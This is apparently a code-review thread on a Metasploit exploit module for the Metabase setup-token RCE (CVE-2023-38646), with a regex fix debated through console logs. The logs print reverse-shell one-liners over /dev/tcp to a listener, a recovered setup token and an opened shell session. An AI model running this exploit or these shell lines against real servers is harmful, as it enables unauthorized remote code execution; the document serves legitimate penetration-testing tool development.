modules/exploits/linux/http/metabase_setup_token_rce.rb

```diff
@@ -0,0 +1,157 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Metabase Setup Token RCE',
+        'Description' => %q{
+          Metabase versions before 0.46.6.1 contain a flaw where the secret setup-token
+          is accessible even after the setup process has been completed. With this token
+          a user is able to submit the setup functionality to create a new database.
+          When creating a new database, an H2 database string is created with a TRIGGER
+          that allows for code execution. We use a sample database for our connection
+          string to prevent corrupting real databases.
+
+          Successfully tested against Metabase 0.46.6.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'h00die', # msf module
+          'Maxwell Garrett', # original PoC, analysis
+          'Shubham Shah' # original PoC, analysis
+        ],
+        'References' => [
+          ['URL', 'https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/'],
+          ['URL', 'https://www.metabase.com/blog/security-advisory'],
+          ['CVE', '2023-38646']
+        ],
+        'Platform' => ['unix'],
+        'Privileged' => false,
+        'Arch' => ARCH_CMD,
+        'DefaultOptions' => {
+          'PAYLOAD' => 'cmd/unix/reverse_bash'
+          # for docker payload/cmd/unix/reverse_netcat also works, but no perl/python
+        },
+        'Targets' => [
+          [ 'Automatic Target', {}]
+        ],
+        'DisclosureDate' => '2023-07-22',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+    register_options(
+      [
+        Opt::RPORT(3000),
+        OptString.new('TARGETURI', [ true, 'The URI of the Metabase Application', '/'])
+      ]
+    )
+  end
+
+  def get_boostrab_json_blob_from_html_resp(html)
+    %r{<script type="application/json" id="_metabaseBootstrap">(.*?)</script>} =~ html
```

Comment:
```suggestion
    %r{<script type="application/json" id="_metabaseBootstrap">([^>]+)</script>} =~ html
```

Reply:
Looks like this introduced accidentally introduces a bug

Before this suggestion with the regex `(.*?)` running against 0.44.1:

```
msf6 exploit(linux/http/metabase_setup_token_rce) > rerun rhost=192.168.123.1 lhost=192.168.123.1 rport=3000
[*] Reloading module...

[+] bash -c '0<&50-;exec 50<>/dev/tcp/192.168.123.1/4444;sh <&50 >&50 2>&50'
[*] Started reverse TCP handler on 192.168.123.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version Detected: 0.42.1
[+] Found setup token: 2c28fc50-2285-4195-8333-11a67719f1c2
[*] Sending exploit (may take a few seconds)
[*] Command shell session 1 opened (192.168.123.1:4444 -> 192.168.123.1:58822) at 2024-10-17 10:26:30 +0100

whoami
metabase
```

After applying the code suggestion of `([^>]+)` it fails:

```
msf6 exploit(linux/http/metabase_setup_token_rce) > rerun rhost=192.168.123.1 lhost=192.168.123.1 rport=3000
[*] Reloading module...

[+] bash -c '0<&139-;exec 139<>/dev/tcp/192.168.123.1/4444;sh <&139 >&139 2>&139'
[*] Started reverse TCP handler on 192.168.123.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[-] Unable to parse JSON blob
[-] Exploit aborted due to failure: unexpected-reply: 192.168.123.1:3000 - Unexpected response, unable to load JSON blob
[*] Exploit completed, but no session was created.
```

Example of the two regex expressions differing:

```
# Before
[1] pry(#<Msf::Modules::Exploit__Linux__Http__Metabase_setup_token_rce::MetasploitModule>)> %r{<script type="application/json" id="_metabaseBootstrap">(.*?)</script>} =~ html
=> 975

# After
[1] pry(#<Msf::Modules::Exploit__Linux__Http__Metabase_setup_token_rce::MetasploitModule>)> %r{<script type="application/json" id="_metabaseBootstrap">([^>]+)</script>} =~ html
=> nil
```

I've swapped this over to xpath for now just incase there's other edgecases with the regex: https://github.com/rapid7/metasploit-framework/pull/19563